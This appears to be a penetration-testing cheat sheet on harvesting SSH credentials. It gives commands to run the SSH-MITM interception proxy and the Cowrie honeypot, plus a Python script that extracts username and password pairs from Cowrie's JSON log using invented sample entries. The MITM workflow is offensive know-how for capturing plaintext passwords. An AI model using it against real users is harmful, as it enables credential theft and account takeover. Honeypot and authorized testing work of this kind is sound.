PRIMARY CATEGORY → PROTOCOLS AND SERVICES

Theory

🛠️⌛

SSH → Secure Shell


SSH Credential Harvesting

Workflow

Here we either force a remote SSH client to connect to a host we control on a port of our choosing (typically the standard SSH port, TCP 22) or simply wait for incoming connections

However the connection arrives, the goal is to see the plaintext credentials of every client that authenticates against our SSH server

The caveat is that a stock OpenSSH server will not do this: with the default configuration it never logs the password a client submits, only whether the authentication succeeded or failed

Two approaches work instead. The first is a MITM tool that listens on the SSH port ( e.g. TCP Port 22 ), records the authentication and proxies the session on to the real OpenSSH server, such as SSH-MITM. The second is a honeypot SSH server that accepts the authentication itself and emulates a UNIX system in high interaction mode, such as Cowrie, so the client never reaches a real server. In both cases only password ( or keyboard-interactive ) authentication yields a reusable secret; a client that authenticates with a public key reveals no private material

MITM

Setup

curl --silent --location 'https://github.com/ssh-mitm/ssh-mitm/releases/latest/download/ssh-mitm-x86_64.AppImage' --output ssh-mitm-x86_64.AppImage
chmod 700 ssh-mitm-x86_64.AppImage

Usage

./ssh-mitm-x86_64.AppImage server --listen-address '<ADDRESS>' --listen-port '<PORT>' --remote-host '<OPENSSH_SERVER>'

Every client that authenticates with a password through the proxy has its username and password recorded by SSH-MITM before the session is relayed to the real server. Caveat: the proxy presents its own host key, so a client that has connected to the real server before gets a host-key-changed warning and, with the default client settings, aborts the connection; this works best against first-time connections or clients with host key checking disabled

Honeypot

Cowrie refuses to start as Root, so deploy it as an unprivileged user. By default it listens on TCP 2222; to receive clients arriving on TCP 22, redirect that port to 2222 ( e.g. with an iptables nat REDIRECT rule ) or bind it via authbind

Setup

mkdir Cowrie
cd Cowrie && python3 -m venv .venv
. .venv/bin/activate && pip3 install cowrie
cowrie init
cowrie start

Usage

tail -F var/log/cowrie/cowrie.log
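Tailing cowrie.log shows the human-readable messages. Cowrie also writes the same events as one JSON object per line to var/log/cowrie/cowrie.json, where the login events carry the username and password as separate fields, which is the easier source for harvesting. The Python script below is an added example, not part of Cowrie or of these notes: it extracts every login attempt from that log, separates accepted from rejected credentials and ranks the most-tried pairs. The log lines embedded in it are constructed for the example (the field names match Cowrie's cowrie.login.success / cowrie.login.failed events; the addresses, timestamps and credentials are invented).

```python
import json
from collections import Counter

# Constructed sample of Cowrie's JSON event log (var/log/cowrie/cowrie.json),
# one JSON object per line. Field names follow Cowrie's real login events;
# the addresses, timestamps and credentials are made up for this example,
# and the last line is deliberately malformed to show it gets skipped.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.10","src_port":51000,"dst_ip":"198.51.100.5","dst_port":2222,"session":"a1b2c3d4e5f6","protocol":"ssh","message":"New connection","sensor":"hp1","timestamp":"2024-01-01T10:00:00.000000Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"hp1","timestamp":"2024-01-01T10:00:01.000000Z","src_ip":"203.0.113.10","session":"a1b2c3d4e5f6"}
{"eventid":"cowrie.login.failed","username":"root","password":"admin","message":"login attempt [root/admin] failed","sensor":"hp1","timestamp":"2024-01-01T10:00:02.000000Z","src_ip":"203.0.113.10","session":"a1b2c3d4e5f6"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"hp1","timestamp":"2024-01-01T10:00:03.000000Z","src_ip":"203.0.113.10","session":"a1b2c3d4e5f6"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"hp1","timestamp":"2024-01-01T10:00:04.000000Z","src_ip":"203.0.113.10","session":"a1b2c3d4e5f6"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"hp1","timestamp":"2024-01-01T10:05:00.000000Z","src_ip":"198.51.100.77","session":"0f0f0f0f0f0f"}
{"eventid":"cowrie.login.failed","username":"backup","password":"123456","message":"login attempt [backup/123456] failed","sensor":"hp1","timestamp":"2024-01-01T10:05:01.000000Z","src_ip":"198.51.100.77","session":"0f0f0f0f0f0f"}
this line is not JSON and must be skipped
"""

# Cowrie event ids that carry credentials, mapped to whether the login was accepted.
LOGIN_EVENTS = {"cowrie.login.success": True, "cowrie.login.failed": False}


def parse_logins(lines):
    """Yield (timestamp, src_ip, username, password, success) for every login event.

    Blank lines, lines that are not valid JSON and non-login events are ignored,
    so the parser survives a log that is being written to while it is read.
    """
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        eventid = event.get("eventid")
        if eventid not in LOGIN_EVENTS:
            continue
        yield (
            event.get("timestamp"),
            event.get("src_ip"),
            event.get("username"),
            event.get("password"),
            LOGIN_EVENTS[eventid],
        )


def harvest(text):
    """Return all login attempts and a Counter of (username, password) pairs."""
    attempts = list(parse_logins(text.splitlines()))
    pairs = Counter((user, pw) for _, _, user, pw, _ in attempts)
    return attempts, pairs


def successful_credentials(text):
    """Only the credentials Cowrie accepted, i.e. what the client believes works."""
    return [(ip, user, pw) for _, ip, user, pw, ok in parse_logins(text.splitlines()) if ok]


if __name__ == "__main__":
    import sys

    # Against a live honeypot: python3 harvest.py < var/log/cowrie/cowrie.json
    source = SAMPLE_LOG if sys.stdin.isatty() else sys.stdin.read()
    attempts, pairs = harvest(source)
    for ts, ip, user, pw, ok in attempts:
        print(f"{ts} {ip:>15} {'OK  ' if ok else 'FAIL'} {user}:{pw}")
    print("\nmost tried credentials:")
    for (user, pw), n in pairs.most_common(5):
        print(f"  {n:3d}  {user}:{pw}")
```

Run it with no input to see the constructed sample, or feed it the real cowrie.json on stdin. Because Cowrie logs failed attempts with the plaintext password as well, the ranked list shows the full wordlist a client tried, not just the pair it finally got in with.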